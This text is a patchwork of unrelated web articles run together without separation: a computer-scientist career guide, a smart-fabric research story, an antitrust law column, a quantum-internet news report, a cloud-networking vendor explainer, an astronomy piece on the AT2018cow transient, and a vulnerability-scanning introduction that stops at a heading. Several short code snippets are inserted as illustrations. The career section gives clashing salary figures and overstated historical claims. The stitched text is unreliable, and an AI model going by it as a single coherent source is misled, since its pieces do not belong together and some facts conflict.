These high-level technologists are a driving force behind the advancement of modern computing. Merging deep technical acumen, creativity and scientific research skills, computer scientists invent new information systems and improve upon existing ones. Computer scientists work in a variety of industries, notably hardware and software design companies, the federal government (especially in the defense sector), IT research firms and academia.

For a better idea of what computer scientists can do, here are some CS superstars and their key accomplishments:

- Alan Turing – "The Father of Computer Science" formalized the concepts of "algorithm" and "computation" with his Turing machine, and developed the British Bombe machine which helped crack Germany's Enigma code in WW2 (1936, 1939)
- Grace Hopper – Invented the compiler, coined the phrase "debugging," and created COBOL, one of the first (and still widely used) programming languages (1940s–50s)
- Shawn Fanning – Popularized P2P (peer-to-peer) file sharing and brought it to the mainstream with Napster (1999)
- James Gosling – Led the team that invented Java, one of today's most prolific and powerful coding languages (1995)
- Steve Jobs – Co-founded Apple, and revolutionized the way we perceive personal and mobile computing (1976, 2007)

While most computer scientists' accomplishments aren't widely known, their valuable contribution is recognized by those in the know, and rewarded in kind: the average salary for computer scientists is over $118,000, according to the latest data from the U.S. Bureau of Labor Statistics. For the truly gifted in this field, the sky's the limit. Technical training providers and accredited universities offer a range of programs to prepare you for the computer scientist career path. Compare the top-reviewed computer science programs online and in your area below.

a.k.a. Computer Information Research Scientist | Computer and Information Scientist

Contents: Computer Scientist Salary | Training and Degrees | Computer Science Jobs | Computer Scientist Job Outlook | Frequently Asked Questions

Computer Scientist Skills & Responsibilities

Computer scientists employ a range of technical and soft skills to succeed in this role. Here are some typical day-to-day activities and marketable skill sets for this job role. Computer scientists:

- Identify and solve complex technology problems in business, medicine and other essential industries.
- Apply and adapt theoretical principles to develop new computer software and/or hardware solutions.
- Are well-versed in CS-related math skills, e.g., linear algebra, calculus, statistics & discrete mathematics.
- Must possess world-class soft skills in complex problem-solving, communication and creative thinking.
- Consult with end-users, managers and vendors to determine computing goals and system requirements.
- May work closely with computer engineers and natural scientists to solve complex computing problems.
- Utilize superior technical writing skills to document and publish their most significant CS findings.
- May supplement their income with [or focus solely on] CS teaching gigs across all levels of academia.
- Not all computer scientists are coders, but those who are should be fluent in the day's leading programming languages, such as Java, C++ and Python.

Computer Scientist Salary

The median annual salary for computer scientists is $127,000, according to the latest data from the U.S. Bureau of Labor Statistics.
Average salaries for computer scientists and related IT career paths:

- Systems Analyst: $79,000
- Software Engineer: $90,000
- Hardware Engineer: $92,000
- UI/UX Designer: $94,000
- Research Statistician: $101,000
- Machine Learning Scientist: $103,000
- Principal Research Scientist: $107,000
- Big Data Scientist: $119,000
- Computer Scientist: $127,000

Highest paying U.S. cities for computer scientists:

- San Jose, CA / Silicon Valley: $171,000
- San Francisco / Oakland, CA: $163,000
- Portland, OR: $150,000
- Seattle, WA: $147,000
- DC Metropolitan Area: $146,000
- Phoenix, AZ: $146,000

Most computer scientists work in full-time salaried positions. For those who work on a part-time or contract basis, the mean hourly wage for computer scientists is about $50, with most falling in the range of $27 to $64 per hour, depending on geographic location, experience, skill set, publications and body of work.

Sources: U.S. Dept. of Labor, Bureau of Labor Statistics | Indeed.com

Computer Scientist Education Requirements

Computer scientist positions in business and academia typically require a graduate degree, such as a master's or Ph.D., in computer science (CS), systems analysis, computer information systems (CIS) or a similar field of study. However, in the federal government and military, many entry-level computer science jobs can be attained with a bachelor's degree, provided you pass the requisite security and background checks, which can be rigorous depending on the agency and role you're applying to.

Marketable skills to look for in a computer scientist degree program include software development and programming, computer hardware engineering, data analysis, information systems management, technical training, technical writing, and advanced mathematics, particularly linear algebra, statistics, calculus and discrete mathematics. Sought-after soft skills for computer scientists include creative thinking, complex problem solving, time management, and effective interpersonal communication, both written and verbal.

Compare training and degree programs that align with computer scientists' education requirements:

Computer Science Degree Programs

Browse accredited degrees, vocational certificates, and online courses matching the computer scientist career track.

Bachelor of Science in Computer Science: Software Engineering
- Gain the Expertise to Pursue Sought-After Roles in Web and Mobile Application Development
- Full Stack Software Design and Engineering
- Build Systems Architectures to Meet Business Needs
- Design UIs for Embedded, Cloud & Mobile Systems
- Analyze and Design Data Structures & Algorithms
- Cybersecurity Tools & Techniques ft. Secure Coding

Associate of Applied Science in IT: Programming & Software Development
- Develop Software for Web and Mobile Devices
- Graphic Design Training ft. Adobe's Creative Suite
- User-Interface and User-Experience Design
- Software Product Development using Agile

Bachelor of Science in Software Development
- Cross-Platform Application Development Training
- User Interface (UI) & User Experience (UX) Design
- Software Testing, Security and Quality Assurance
- Advanced Data Modeling and Database Development
- Manage Software Projects with Agile Best Practices
- Transfer Previous College Credit to Lower Tuition

Master's in Technology Management
- Prepare to Lead Personnel and Use Emerging Technologies to Achieve Organizational Goals
- Choose from courses such as:
- Business Intelligence and Data Analytics
- Cyber Security Threats & Vulnerabilities
- Managing Diverse Organizations in a Flat World
- Cloud Computing and Virtualization
- Cryptography & Network Security
- Computer Systems Analysis
- No GRE or GMAT Required for Admission

Computer Scientist Jobs

Your computer science training and experience may qualify you for a range of job roles, including:

- Data Scientist jobs
- Computer Systems Analyst jobs
- Software Developer jobs
- Hardware Engineer jobs
- Research Analyst jobs
- Data Analyst jobs
- Computer Science Instructor jobs
- More Computer Science job openings

Computer Scientist Job Outlook

The U.S. Bureau of Labor Statistics projects 22% growth in the computer scientist job market from 2020 to 2030, much faster than the 8% average for all occupations over this period. Computer scientists are charged with advancing and innovating all aspects of technology, so as technology continues to play a larger role in how we live and work, the job outlook for computer scientists will remain bright.

To improve your chances of getting hired for a lucrative computer science position, bolster your learning plan with training in software development, currently the fastest-growing and most sought-after skills domain in the IT workforce. Complementing your curriculum with coursework in hot and emerging areas like robotics, big data analysis, artificial intelligence and cyber security will further boost your computer scientist job prospects.

Source: U.S. Bureau of Labor Statistics

Frequently Asked Questions

Tech insiders answer common questions from prospective computer scientists.

How much do computer scientists make?
The median salary for computer scientists is $126,830, according to the US Bureau of Labor Statistics. This is much higher than the median wage for all occupations in America, which is $41,950.

How long does it take to become a computer scientist?
Most computer scientist positions require a master's degree or higher, so it typically takes 6 years of education to become a computer scientist (4 for a bachelor's + 2 for a master's). Some schools offer fast-track computer science degrees where students can simultaneously earn their CS bachelor's and CS master's in 4.5 to 5 years.

What percentage of computer scientists are female?
20 percent of computer scientists are female, according to the US Bureau of Labor Statistics.
Computer scientists at the University of Washington have developed a new type of smart fabric that can store security codes and identification tags. Presented at UIST 2017, the work exploits previously unexplored magnetic properties of conductive thread. The stored data can be read with a smartphone's magnetometer, an existing sensor that normally supports navigation apps.

"This is a completely electronic-free design, which means you can iron the smart fabric or put it in the washer and dryer," said senior author Shyam Gollakota, associate professor in the Paul G. Allen School of Computer Science & Engineering. "You can think of the fabric as a hard disk: you're actually doing this data storage on the clothes you're wearing."

Conductive embroidery thread is commonly used to carry electrical current, but off-the-shelf conductive thread also has magnetic properties, which can be manipulated to store either digital data or visual information like letters or numbers. The device used to read the data is the magnetometer, which measures the strength and direction of magnetic fields and is embedded in most smartphones. "We are using something that already exists on a smartphone and uses almost no power, so the cost of reading this type of data is negligible," said Gollakota.

The researchers stored the password to an electronic door lock on a conductive fabric patch sewn to a shirt cuff, then unlocked the door by waving the cuff in front of an array of magnetometers. To encode data, they align the thread's magnetic poles in either a positive or negative direction, corresponding to the 1s and 0s of digital data. They used conventional sewing machines to embroider fabric with off-the-shelf conductive thread, whose magnetic poles start out in a random order; rubbing a magnet against the fabric aligns them. The fabric can be re-magnetized and re-programmed multiple times, and a patch retains its data through ironing and machine washing.

The team also demonstrated that magnetized fabric can be used to interact with a smartphone while it is in one's pocket, developing a glove with conductive fabric sewn into its fingertips. Each gesture made at the smartphone produces a different magnetic signal that performs a specific action, like pausing or playing music. "With this system, we can easily interact with smart devices without having to constantly take it out of our pockets," said lead author Justin Chan, an Allen School doctoral student. The phone recognized six gestures: left, right, upward, downward, click and back click.

Future work is focused on developing custom textiles that generate stronger magnetic fields and are capable of storing a higher density of data.
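As a purely illustrative sketch of the encoding idea, each magnetized stretch of thread stands in for a 1 (north) or 0 (south), and reading reduces to taking the sign of a magnetometer sample. The field strengths and noise values below are invented for the example:

```python
# Illustrative bit encoding/decoding via magnetic polarity (hypothetical numbers).

def encode_bits(bits: str) -> list[int]:
    """Map bits to magnetization polarities (+1 = north, -1 = south)."""
    return [1 if b == "1" else -1 for b in bits]

def decode_readings(field_samples_ut: list[float]) -> str:
    """Recover bits from magnetometer samples (microtesla): sign -> bit."""
    return "".join("1" if s > 0 else "0" for s in field_samples_ut)

polarities = encode_bits("1011")
# Simulated noisy magnetometer readings over each magnetized segment.
samples = [p * 42.0 + n for p, n in zip(polarities, [3.1, -2.4, 1.7, -0.8])]
print(decode_readings(samples))  # "1011"
```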
Here's how to avoid the "red lights" and navigate the "yellow lights" of antitrust law.

In the first column in this series, we discussed how antitrust laws are the traffic lights for business. The focus of this column is the most important antitrust "red light" – horizontal price-fixing – and several business practices that, while common, are actually "yellow lights" that can lead to significant antitrust risk if not undertaken with care.

What is Horizontal Price-Fixing?

Horizontal price-fixing occurs when two or more competitors conspire to set prices, price levels, or price-related terms for their goods or services. With very limited exceptions, price-fixing is per se illegal, regardless of its reasonableness or actual effect on competition. As a result, price-fixing is serious business. The fines and criminal sentences discussed in the first column of this series all arise from Department of Justice investigations into price-fixing.

Beware: agreements among competitors may constitute price-fixing even where they do not involve the ultimate price of a product. Examples of unlawful price-fixing arrangements include agreements between competitors on:

- A method of quoting prices.
- Uniform or standard trade-in allowances.
- Price differentials between grades of production.
- Percentage of functional discounts.
- Price or feature advertising.
- Excluding a low-price competitor from a trade show.
- Shipping or credit terms.

Other types of agreements, such as those that interfere with competitive bidding or seek to control production, also have an effect on price and can raise serious antitrust concerns.

Price-fixing has been per se illegal as long as there have been antitrust laws. Thus, most price-fixing is not accomplished by express agreement, and direct evidence of collusion is rare (although there are some astonishing exceptions). Generally, collusion is accomplished subtly and is, therefore, proven by inference from otherwise common business practices involving communications and cooperation between competitors. That makes it important to be aware of which common practices create that risk, and how to engage in them lawfully to minimize it.

Exchanging Information with Competitors

As a general rule, while not illegal per se, it is best never to discuss prices, costs, production, purchase terms, territories, or customers with competitors. While courts recognize that the exchange of price information can in some cases increase economic efficiency and make markets more, rather than less, competitive, direct price exchanges are routinely deemed evidence of a scheme that violates the antitrust laws. Price data is best shared by competitors, if at all, only indirectly and in ways that make the information disseminated to competitors cumulative and generic. Even where the information exchange is done carefully and with the best of intentions, the most important factor in determining whether the law has been violated is whether there is a demonstrable anti-competitive price effect.

Although the exchange of cost information is less problematic from an antitrust perspective, the same cautions apply. Care should also be taken in exchanging credit, production, and other confidential business information, because each can, and does, affect the ultimate price of a product. The greatest danger that arises from the exchange of sensitive information among competitors is that it creates one more fact from which a jury may be allowed to infer a per se illegal price-fixing conspiracy.
It is not difficult to imagine a jury finding that a conspiracy exists where competitors exchange price lists and their respective prices subsequently rise to the same level, even if the pricing was purely coincidental and innocent.

Gathering of Competitor Information

Companies certainly may and do seek information about their competitors, but they should do so from a source other than the competitor. For example, a company could legitimately obtain a competitor’s price list from a distributor or from a public bid document. Because of the inferences that can be drawn from the use of that information, however, any employee receiving a competitive price list should contemporaneously document in writing when, where, how, and from whom the price list was received. That will help ensure that, if the company faces an antitrust suit years later, the company can prove it received the list from someone other than a competitor. As information becomes increasingly available on the web pages of competitors, a company may also find useful information there, subject to appropriate documentation of the public source.

It is also common for trade associations to collect information in the form of sales and production data from individual members, aggregate that data, and disseminate it to the association’s membership. This, too, is generally permissible, provided that the trade association takes care to assure that the information is sufficiently aggregated so that the association is not merely acting as a conduit between competitors to exchange sensitive information. Where, however, the relevant market is concentrated, even an exchange of public information may be considered to create the inference of an agreement among members of the association to curtail production and raise prices by signaling planned behavior. Thus, where a concentrated market exists, it is prudent not only to avoid price information exchanges with competitors, but also to consult legal counsel before participating in, or responding to, any trade association activities or industry analyst’s survey or request for price information, including discounts, rebates, shipping and credit terms.

Joint Purchasing & Other Competitor Collaboration Arrangements

Joint purchasing agreements can be lawful because their effects can be pro-competitive. Because of the prevalence of such arrangements, as well as other competitor collaborations for joint research and development, production, marketing, distribution, and sales, the Federal Trade Commission and the U.S. Department of Justice adopted formal Antitrust Guidelines for Collaborations Among Competitors in April 2000. These guidelines and subsequent interpretations by both agencies provide an analytical framework and specific “safe harbors” based on factors like market share, market concentration, and the scope and length of the collaboration, all of which help assess whether the proposed joint activity is more or less likely to achieve efficiencies that will benefit consumers. In general, the higher the market share of the competitors individually, or as a proposed group, the stricter the scrutiny that will be applied, but any business contemplating a collaborative effort with one or more of its competitors should review the Guidelines carefully.

Other Non-Price-Related Agreements

Some common horizontal agreements do not involve price, but are nonetheless often deemed anti-competitive and therefore illegal.
Perhaps the most familiar are concerted refusals to deal or group boycotts—arrangements in which those at the same horizontal level of the market agree not to deal with competitors, customers or suppliers. The intent of the boycott is to disadvantage competitors, and it is often accomplished by cutting off a competitor’s access to a necessary supply, facility or market, either by direct denial or through other coercion. These concerted refusals to deal are often the subject of private antitrust suits (and treble damages claims) and complaints to antitrust regulatory authorities. They also present the highest risk that a manufacturer will join a horizontal conspiracy among its distributors and find its otherwise legitimate business plans deemed per se illegal. Even a series of purportedly vertical relationships between a dealer and its various suppliers that results in the suppliers boycotting the dealer’s competitors may violate the antitrust laws. To avoid this potential risk, suppliers and dealers need to follow some simple rules:

- Suppliers should never agree with competitors to refuse to sell products to common dealers or customers.
- A supplier should never agree with a group of its customers or dealers not to deal with some other dealer or customer.
- Competing dealers must remember that the antitrust laws view them as competitors and view any horizontal agreement between them harshly.
- Aggrieved dealers should complain directly to the supplier without involving other dealers, and the supplier should do no more than listen politely, taking action, if any, unilaterally without involving the complaining dealer further, much less agreeing on a course of action.

Horizontal agreements to divide markets or allocate customers are also per se unlawful, and run a close second to price-fixing schemes in the number of agreements condemned. Bid rigging, for example, is considered an agreement to allocate customers and has resulted in jail terms for participants. Market divisions among potential, as well as actual, competitors are also unlawful. Customer allocations and territory divisions by and among competitors are generally condemned because they are indirect forms of production or output restrictions. For example, exclusive distributorship agreements between competitors that restrict one party from competing in the market of another party may constitute a horizontal allocation that denies consumers in both markets the benefits of competition on price and quality.

In contrast, courts have recognized that some products could not be offered without limited cooperation between competitors. For example, professional sports leagues could not produce games without agreements on schedules, rules, and certain splits of gate receipts. In these situations, where horizontal market and customer allocations are ancillary to an integration of economic activities by the parties, and where those integrated economic activities are actually pro-competitive, courts have judged the actions under the rule of reason.

Covenants not to compete are also analyzed under the rule of reason. They have many business and legal implications, but in the antitrust context are usually examined for reasonableness with regard to time, territory, and type of product. Plaintiffs bear a heavy burden to prove that a covenant not to compete violates the Sherman Act when the covenant arises as part of a legitimate business transaction.
To be lawful, restrictive covenants need only be:

- Ancillary to the main purpose of the lawful contract.
- Neither imposed by a party with monopolistic power, nor in furtherance of a monopoly.
- Partial in nature and reasonably limited in time and scope.
- No greater than necessary to afford fair protection to the parties, and not so extensive as to interfere with the interest of the public.

To succeed on a claim for a § 1 violation based on a covenant not to compete, a defendant must have knowingly enforced an invalid non-competition agreement, and the plaintiff must show an adverse impact on competition in the relevant market stemming from enforcement of the provision, either through direct evidence (for instance, showing a decrease in supply) or a more elaborate showing of adverse effects on competition without pro-competitive justification. Thus, as a general rule, unless a covenant not to compete amounts to an allocation of customers or markets, it will survive antitrust challenge.

In short, while competitor collaborations can occur on a number of levels, and often have significant, beneficial effects on the market, they can also have precisely the opposite effect. As a rule of thumb, it is always prudent to start with the assumption that any collaboration among competitors is a yellow light, and potentially a red light in practice if not policy, more than justifying advance consultation with the legal department before moving forward.

For more information, read Pricing Issues And Antitrust Law.

Roberta F. Howell is a partner at Foley & Lardner LLP in Madison, Wis. She is co-chair of the firm’s Distribution and Franchise Practice.
Impacts could be realized within the next decade.

The Energy Department on Thursday released a strategic blueprint to construct a potentially “unhackable” nationwide quantum internet. The plan to develop a prototype that relies on quantum mechanics to connect next-generation computers and sensors and underpin securely transmitted communications is the result of a workshop held by Energy in New York City in February. There, around 70 stakeholders from across sectors united to confront engineering and design barriers, pinpoint research needed and puzzle out how to transform existing, local network experiments into a viable ‘second’ internet.

Energy’s 17 national laboratories will serve as the backbone of the system, according to the agency, which confirmed that the desired outcome could be fully realized within the next decade. “This is one of the most important technology innovations of the 21st century,” Argonne National Lab Director Paul Kearns said during a news conference unveiling the announcement in Chicago Thursday. “It'll lead the way to many remarkable benefits for society at large.”

The quantum landscape is rife with complexities, but to help attendees better grasp the endeavor, David Awschalom, a senior scientist at Argonne and professor at the University of Chicago’s Pritzker School of Molecular Engineering, explained during the event that nature “behaves very differently”—namely, it follows the world of quantum physics—at the atomic scale. “In this quantum world, particles can exist in multiple states at the same time, like on and off but simultaneously. And they can be entangled, that is, they can share information with one another—even over very long distances and even without a physical connection,” he explained. “So while this special world is invisible to us, a quantum internet is going to harness these strange properties to build new types of devices with powerful applications and communication, national security, finance and medicine.”

Moves to produce the quantum internet are already making progress in the Chicago region—as Energy puts it, Argonne scientists in Lemont, Illinois, and the University of Chicago in February “entangled photons across a 52-mile ‘quantum loop’ in the Chicago suburbs, successfully establishing one of the longest land-based quantum networks in the nation.” Now, in this new streamlined effort, the network produced will connect to Energy’s Fermilab in Batavia, Illinois, to create “a three-node, 80-mile testbed.”

“The combined intellectual and technological leadership of the University of Chicago, Argonne, and Fermilab has given Chicago a central role in the global competition to develop quantum information technologies,” Robert Zimmer, president of the University of Chicago, said in a statement. “This work entails defining and building entirely new fields of study, and with them, new frontiers for technological applications that can improve the quality of life for many around the world and support the long-term competitiveness of our city, state, and nation.”

Scientists from Stony Brook University and Brookhaven National Laboratory also recently produced an 80-mile quantum network testbed, which they are actively expanding. But America isn’t the first to engage in such a monumental pursuit. A key U.S. technology competitor—China—which has invested in quantum information science for years, “has been breaking distance records for quantum networks,” the new strategy notes.
Europe also previously launched the Quantum Internet Alliance to craft the first blueprint for a quantum internet. The U.S. strategy explores various hardware and software components that must be developed for the plan to come to fruition and details how the networks should be built over time. It includes four priority research directions and five key roadmap milestones that it says “must be achieved to facilitate an eventual national quantum internet.”

According to Energy, the to-be-developed networks could be “virtually unhackable,” as it’s exceedingly difficult to intrude on quantum transmissions. “One of the interesting aspects of quantum data is the act of looking at it changes it,” University of Chicago’s Awschalom explained. “So this means if we use a quantum network to send or receive information, and someone tries to eavesdrop, they'll destroy the message. It’s quantum secure.”

As Awschalom previously alluded to, those in the health, banking and airline industries, as well as national security-focused insiders, are likely to be the earliest adopters, but the agency also predicts that “eventually, the use of quantum networking technology in mobile phones could have broad impacts on the lives of individuals around the world.” Energy’s Undersecretary for Science Paul Dabbar echoed a Henry Ford quote in reference to potential applications during the announcement. “If I would have asked customers what they wanted, they would have told me ‘a faster horse.’ People don't know what they want until you show it to them,” he said, adding, “and that is what we are beginning today.”

In a press call following the unveiling, Dabbar and other officials stopped short of confirming or elaborating on the ultimate cost and funding channels for the ambitious endeavor. President Trump’s budget request for 2021, nevertheless, includes $25 million specifically intended for Energy’s Office of Science “to support early stage research for a quantum internet.”

JD Dulny, a chief scientist leading Booz Allen Hamilton’s quantum computing research team, told Nextgov Friday that insiders at the firm are “excited to see this next step for U.S. quantum information sciences.” “Quantum advancements are changing the ways we use computing, communications, and sensing technologies today,” Dulny said. “A well-developed ‘quantum internet’ of the future will bring the benefits of increased security and increased computational power to a broader audience, and provide next-generation distributed precision sensing capabilities.”
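The entanglement Awschalom describes can be sketched in simulation with a few lines of code. The following illustrative example is our addition, not part of the DOE blueprint; it assumes the open-source Qiskit library (with qiskit and qiskit-aer installed, API roughly as of Qiskit 1.x). It prepares a two-qubit Bell pair and measures it: the two bits always agree, which is the kind of correlation a quantum network would exploit and an eavesdropper's measurement would disturb.

from qiskit import QuantumCircuit
from qiskit_aer import AerSimulator

# Prepare a two-qubit Bell state: Hadamard on qubit 0, then CNOT 0 -> 1.
qc = QuantumCircuit(2, 2)
qc.h(0)         # put qubit 0 into a superposition of 0 and 1
qc.cx(0, 1)     # entangle qubit 1 with qubit 0
qc.measure([0, 1], [0, 1])

# Simulate many runs; the measured outcomes are perfectly correlated.
counts = AerSimulator().run(qc, shots=1000).result().get_counts()
print(counts)   # roughly {'00': ~500, '11': ~500}; never '01' or '10'

If an eavesdropper measured one qubit in transit, the correlation statistics would change, which is the intuition behind the “looking at it changes it” property quoted above.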
What is cloud networking? An overview of the technology and its challenges

After reading this article you will be able to:
- Understand what cloud networking is
- Understand how cloud networking is different than data center networking
- Differentiate connecting to the cloud and networking in the cloud
- Learn to avoid cloud networking myths and misconceptions

Networking has evolved for the Cloud Era. As enterprise computing transforms from data center centric architectures to cloud centric architectures (using AWS, Azure, Google and Oracle), the underlying networking platform has evolved from a 1990s hardware-centric, client-server/Internet network design to a fully software-centric cloud networking design for the cloud era. This article explains what cloud networking is, how it is different than traditional data center networking, and why forward-thinking enterprise network, security and cloud architects view cloud networking technology and operational practices as the future of enterprise networking.

What is cloud networking?

Networking, as it has always been, is the communications infrastructure that allows users and applications built on distributed compute platforms to interact. Cloud networking is networking that has been specifically developed to operate in public clouds, embracing the simplicity and agility of cloud infrastructure, while delivering the operations and security enterprises require. A core part of cloud networking is intelligent cloud routing. While native cloud constructs allow network engineers to manually update route tables, this becomes a major challenge for dynamic, enterprise-scale deployments that need fully automated processes. Modern cloud networking solutions offer centralized intelligence and control over routing in the cloud network, replacing manual processes and allowing multi-cloud network automation and advanced traffic engineering. A cloud network platform leverages and controls underlying native public cloud networking constructs, while adding advanced networking, security and operational capabilities not offered by the underlying clouds to create a superset network abstraction that simplifies and enhances networking consistently within and across disparate public clouds.

How is cloud networking different than traditional data center networking?

Traditional data center network architectures are optimized and scaled based on fixed, physical, on-premises designs, built and managed with a legacy, box-by-box operational model. These legacy network solutions reinforce a data center centric approach, desperately trying to maintain the physical data center architecture their businesses depend on, while the center of gravity is rapidly shifting to public clouds. Traditional networking is “cloud naïve”, effectively deploying a virtual version of hardware on a cloud compute platform which is completely unaware that it is even in a cloud. Traditional network architectures and operational models will prove untenable as enterprises migrate into public clouds and develop an inevitable multi-cloud network strategy.
Conversely, cloud networking is purposely designed to be “cloud native” and fully embraces the shift to public cloud and the distributed nature of cloud-based applications. Cloud networking is built into cloud platforms; it is on-demand, highly available, resilient, intelligent and secure. Cloud networking is specifically designed to deliver cloud simplicity, scale and elasticity through infrastructure-as-code automation and multi-cloud operational visibility that facilitates fast troubleshooting and resolution of network issues that can impact application availability.

Key Benefits of Cloud Networking:
- Simple to Procure and Deploy
- Operational Efficiency
- Consistent Security
- Multi-Cloud Network Readiness

Who should care about Cloud Networking?

Cloud Architects and Operations Teams – While your focus is often on applications, a well-architected cloud network architecture will make your life much simpler. Be wary of data center architecture extensions positioned as cloud networking, and understand that there are networking limitations and challenges that cloud providers will avoid bringing up and that are not obvious in small or single-cloud designs.

Network Architects, Engineers and Operations Teams – A DIY approach can work, but it’s likely to be difficult and costly to build, maintain, and modify. Take the time to understand what a modern cloud networking platform can offer.

Security Architects, SecOps and Corporate Compliance Teams – Centralized, consistent security policies, enforcement and auditing across a single or multiple cloud network significantly reduces risk. Take the time to understand how cloud networking and security has evolved for the cloud.

DevOps Teams – Infrastructure-as-code automation is critical for DevOps teams to achieve the speed and agility applications teams need from their networking and security counterparts. Cloud networking offers a radical departure from traditional networking and security operational models and allows seamless integration into enterprise DevOps CI/CD pipelines.

Myths and Misconceptions of Cloud Networking

Multi-Cloud Networking – Connecting to the Cloud versus Cloud Networking

As enterprises leverage multiple public clouds – driven by customer requirements, acquisitions, or simply because some business-critical applications operate better in one cloud than another – cloud networking is multi-cloud networking. It is important, however, to recognize the difference between networking to clouds and cloud networking. Many datacenter-centric technologies and services are designed to connect branch offices to datacenters or datacenters to other datacenters. Examples include SD-WAN, private connectivity providers such as Equinix and Megaport, and SASE offerings such as Palo Alto Networks and Zscaler. These vendors market their solutions as “multi-cloud” or cloud networking, meaning they connect to multiple clouds but stop at each cloud’s edge. True cloud networking is software-based networking, security and operational services, which operate within multiple regions of a single cloud; from on-prem datacenters, branch offices, and remote users to the cloud; and between multiple public clouds. Cloud networking delivers a consistent and repeatable network and security architecture and offers enterprise-class operational visibility in the cloud, while also supporting connections to enterprise investments in traditional data center technologies, such as SD-WAN.
Native Cloud Constructs Don’t Do Everything You Need

Cloud service providers will tell you that they provide everything and anything you need for networking in the cloud. Simply not true. There are significant limitations and challenges around routing, traffic engineering, operational visibility, control and multi-cloud consistency you need to be aware of. Evaluate a cloud network platform that leverages and controls native cloud networking constructs, but adds a superset of advanced services, operational visibility and control, even in a single cloud, and provides a multi-cloud network architecture allowing your team to be multi-cloud ready.

Data Center to the Cloud or Cloud to the Data Center

As the center of gravity for enterprise applications shifts from data center to the cloud, architecture and operational models must change. Traditional vendors will position extensions of data center technologies and operating models as the best approach for the cloud or a transition to the cloud. Forward-thinking cloud and network architects recognize that their company’s future is heavily weighted to applications and data being in the cloud, on cloud networking, rather than in on-premises data centers, on data center networks. Expect a dramatic shift in perspective as cloud services, such as AWS Outposts, expand from the cloud back to the data center, where needed, and bring the cloud operational models on-premises, rather than the other direction.
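To make the routing limitations discussed above concrete: in AWS, the native construct is the VPC route table, and replacing manual console edits with code looks roughly like the sketch below. This is an illustrative fragment using the boto3 SDK; the resource IDs and CIDR are placeholders, and a true multi-cloud platform would hide this per-cloud logic behind a single abstraction.

import boto3

ec2 = boto3.client("ec2", region_name="us-east-1")

# Hypothetical resource IDs, for illustration only.
ROUTE_TABLE_ID = "rtb-0123456789abcdef0"
TRANSIT_GATEWAY_ID = "tgw-0123456789abcdef0"

# Instead of hand-editing the route table in the console, codify it:
# send traffic for 10.1.0.0/16 through a transit gateway.
ec2.create_route(
    RouteTableId=ROUTE_TABLE_ID,
    DestinationCidrBlock="10.1.0.0/16",
    TransitGatewayId=TRANSIT_GATEWAY_ID,
)

Equivalent calls exist in each cloud's SDK, which is exactly why a consistent, cloud-agnostic routing layer becomes valuable once more than one provider is involved.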
A mysterious stellar explosion has given scientists a window into the source of certain massive, short-lived supernovae. The explosion in question, procedurally named AT2018cow—and lovingly known as “the Cow”—flashed like a supernova in June of 2018. But it lasted much shorter than normal supernovae, and it emitted different colored light, making it what astronomers call a “fast blue optical transient.”

Such events are fleeting and consequently easy to miss. Where a typical supernova develops for a month or two and fades over a few more months, these objects “go up in less than a week” and “disappear in less than a month,” says Dheeraj Pasham, an astrophysicist at MIT and lead of a new study on the Cow published in the journal Nature Astronomy this week. These swift explosions are difficult to catch with most astronomical surveys, which may only re-scan the same area of the night sky once a month—too slow to catch an event that lasts a few weeks. But recent advances in telescope technology have allowed for much faster scans—sometimes even catching multiple views of the same patch of sky per night, he says.

Fortunately, the Cow was “identified at the right time,” Pasham says. Astronomers realized it was there just days after it appeared. All over the world, researchers trained all sorts of fancy telescopes on it, analyzing it across optical, ultraviolet, x-ray, radio, and other frequencies of light. At 100 times brighter than a typical stellar explosion, the Cow is among the brightest of these unusual supernovae.

In an average supernova, a star runs out of fuel, collapses in on itself, and bursts in an enormous explosion. The Cow and the few blasts like it are so extreme that scientists can’t explain them through these mechanisms alone. “There must be some additional source of energy” to bridge the huge difference in brightness between these and standard supernovae, Pasham says.

As for where this extra boost comes from, there are a plethora of ideas. One possibility, which isn’t far off from a standard supernova, is that the core of the star collapsed and formed a rotating neutron star with a strong magnetic field, called a magnetar. The rapid spin of this magnetar could have transferred energy to the massive blast astronomers observed. Similarly, the core of the star could have formed a black hole, causing the outer layers of the star to fall into it, which also would emit a lot of energy, potentially explaining the larger boost. Other hypotheses have been floated in the past, too, such as a collision between two white dwarfs or a black hole ripping apart one white dwarf with its overwhelming gravity.

But Pasham’s team seems to have ruled out causes that don’t involve a neutron star or black hole, says Cosimo Inserra, an astrophysicist who studies supernovae at Cardiff University in the UK and was not involved with the study. “There’s still no smoking gun” that shows what happened, Inserra says, but the study of the x-ray signal was “extremely thorough” and ruled out many possible explanations. At present, every possible explanation for the Cow seems to have some issue with it, he says. For the neutron star explanation, he says the x-ray signal should have slowed down over the course of 60 days, but didn’t.
A black hole might be that stable, but one has never been observed to behave like this before, he says. The energy of a compact object, meaning a black hole or neutron star, plus another unknown factor may have resulted in the explosion, Inserra says. For instance, the star could have been surrounded by a shroud of matter. Once the star exploded, its remnants would have ploughed through the cloud, producing a bigger flash. Or the exploding star could have been in orbit with another object, adding to the bang.

Pasham and his colleagues say they’re convinced a black hole or neutron star was involved, based on their x-ray measurements from the explosion using NASA’s Neutron star Interior Composition Explorer (NICER), an instrument on the International Space Station. Currently, Pasham notes, no other tool acquires data fast enough to capture this kind of x-ray signal. This study, paired with several prior ones, has provided the “nail-in-the-coffin proof that it’s indeed a compact object,” Pasham says.

The brightness of the Cow’s x-rays changed over time—brightening and dimming—in a cycle that lasted 4.4 milliseconds. To Pasham, this looks like a sign that matter is closely orbiting a “newborn” black hole or a type of neutron star called a magnetar, and the matter shines with x-rays each time it completes a rapid orbit. Currently, the research team can’t tell whether a black hole or magnetar caused the cycle they observed. Doing so would require a “huge amount of computational power,” Pasham says, which the team is now seeking.

With so many future sky surveys in the works, Pasham is confident astronomers will detect many more of these objects. “This,” he says, “is just the beginning.”
What Is Vulnerability Scanning?

Vulnerability scanning is the process of scanning computing resources to identify exploitable vulnerabilities, usually using automated tools. When new vulnerabilities are discovered, the security research community publishes signatures for those vulnerabilities. Vulnerability scanners use a list of signatures to test networks, applications, and infrastructure, identify known vulnerabilities, and assist with their remediation.

Why Are Vulnerability Scans Important?

Vulnerabilities are an open door to exploitation by attackers. The main goal of vulnerability scans is to prevent cyberattacks, or reduce their impact, by identifying and remediating critical vulnerabilities. In addition, vulnerability scans can help organizations become more proactive in their security efforts. Vulnerabilities often exist in a system before they cause noticeable damage. Scanning helps teams find threats and take action before serious damage occurs. Vulnerability scans also help developers and security teams prioritize risk—helping identify the issues requiring immediate action.

The Vulnerability Scanning Process

